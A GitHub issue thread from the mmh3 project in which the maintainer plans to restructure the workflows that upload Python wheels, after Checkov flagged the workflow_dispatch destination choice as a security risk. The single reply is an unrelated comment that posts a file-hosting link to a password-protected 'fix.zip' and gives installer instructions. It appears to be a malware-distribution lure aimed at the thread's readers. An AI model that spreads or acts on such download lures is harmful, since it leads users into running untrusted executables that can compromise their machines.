### ISSUE TITLE
Enhance security by refining the uploading workflow

### ISSUE THREAD

**Issue by hajimes** [hajimes/mmh3#62]
As of mmh3 4.1.0, the destination for built Python wheels is specified by `workflow_dispatch` (choices: a dummy value for local testing, TestPyPI, and real PyPI). However, this approach can cause a security issue, as reported by Checkov via super-linter 7.0.0.

To address this issue, I will create a composite action for building wheels that can be reused across different workflows. Then,  I will write three separate uploading workflows: one for local testing (by "local" I mean GitHub Actions), one for TestPyPI, and one for production. Each of these workflows will call the reusable composite action.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
